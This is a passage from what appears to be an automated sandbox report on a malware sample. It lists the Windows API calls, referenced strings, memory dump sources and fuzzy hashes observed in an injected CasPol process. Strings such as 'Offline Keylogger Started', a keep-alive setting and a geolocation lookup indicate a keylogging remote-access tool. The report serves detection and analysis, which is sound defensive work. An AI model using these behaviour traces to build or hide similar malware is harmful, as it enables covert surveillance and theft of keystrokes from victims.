                                                                                                                                                                          • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                                                                                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                                                                                                          Strings
                                                                                                                                                                          • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                          • String ID: http://geoplugin.net/json.gp
                                                                                                                                                                          • API String ID: 3121278467-91888290
                                                                                                                                                                          • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                                                                                                          • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                                                                                                                          • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                                                                                                          • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                                                                                          • String ID: xpF
                                                                                                                                                                          • API String ID: 1852769593-354647465
                                                                                                                                                                          • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                                                                          • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                                                                                                          • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                                                                          • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                                                          • __freea.LIBCMT ref: 10008A08
                                                                                                                                                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                          • __freea.LIBCMT ref: 10008A11
                                                                                                                                                                          • __freea.LIBCMT ref: 10008A36
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1414292761-0
                                                                                                                                                                          • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                          • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                                                          • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                          • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                            • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4,1000C7DD), ref: 1000C804
                                                                                                                                                                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                          • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                          • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                                                                          • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                                          • String ID: hQG
                                                                                                                                                                          • API String ID: 1958988193-4070439852
                                                                                                                                                                          • Opcode ID: 6ecf9d3ddebe9b008ab1d83f498866658564dad8f2fc55020f3775752d25f7c1
                                                                                                                                                                          • Instruction ID: fcd55a72cf9b38ed92eee25b8fc798016c5179a181dae4a4499eb8880f316315
                                                                                                                                                                          • Opcode Fuzzy Hash: 6ecf9d3ddebe9b008ab1d83f498866658564dad8f2fc55020f3775752d25f7c1
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E113130600740AADA30A7249889A1F37BAD741356F44483EE182676D3C67DDC64C71F
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                            • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                            • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4,1000C7DD), ref: 1000C804
                                                                                                                                                                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                          • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                          • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,1000C7F4,1000C7DD), ref: 1000C804
                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2152742572-0
                                                                                                                                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                          • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                          • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                                                                                                                          • _free.LIBCMT ref: 00448353
                                                                                                                                                                          • _free.LIBCMT ref: 0044837A
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                          • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                                                                                          • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                                                                                          • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                                                                                                                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                                          • String ID: Offline Keylogger Started
                                                                                                                                                                          • API String ID: 465354869-4114347211
                                                                                                                                                                          • Opcode ID: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                                                                                                          • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                                                                                                          • Opcode Fuzzy Hash: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
                                                                                                                                                                          • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocalTime.KERNEL32(00000001,00474EF0,004755A8,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF0,004755A8,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                                                                                                          Strings
                                                                                                                                                                          • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create$EventLocalThreadTime
                                                                                                                                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                          • API String ID: 2532271599-1507639952
                                                                                                                                                                          • Opcode ID: 3ab5d40a6173cc37a5089b7803cdb329b1a20d2c34f33e0a08a5a9fcc06a0ff2
                                                                                                                                                                          • Instruction ID: 4df055e7b18788cc2e6f6b282d58d8d1f041b9f055d7d752625e2c9c7705ec55
                                                                                                                                                                          • Opcode Fuzzy Hash: 3ab5d40a6173cc37a5089b7803cdb329b1a20d2c34f33e0a08a5a9fcc06a0ff2
                                                                                                                                                                          • Instruction Fuzzy Hash: D7110A71900385BAC720A7779C0DEABBFACDBD2714F04046FF54162291D6B89445CBBA
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                                                                                          • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                                                                                                          • RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateValue
                                                                                                                                                                          • String ID: pth_unenc
                                                                                                                                                                          • API String ID: 1818849710-4028850238
                                                                                                                                                                          • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                                                                          • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                                                                                                                          • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                                                                                                                                          • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F60), ref: 00404DB3
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,?,00474F08,00000000,00000000), ref: 00404DC7
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3360349984-0
                                                                                                                                                                          • Opcode ID: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                                                                                                                                                          • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                                                                                                          • Opcode Fuzzy Hash: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                                                                                                                                                          • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                                                                                                                          • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                          • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                                                                                          • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                                                                                                                          • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                                                                                          • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                                                          • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                          • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                          • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                                                          • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                                          • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3919263394-0
                                                                                                                                                                          • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                                                                                          • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                                                                                                                          • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                                                                                                          • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CountEventTick
                                                                                                                                                                          • String ID: !D@
                                                                                                                                                                          • API String ID: 180926312-604454484
                                                                                                                                                                          • Opcode ID: 943d233b4da6a66401ce6f93dd42c62b0fddc350c13312a5139ff755dbddca0b
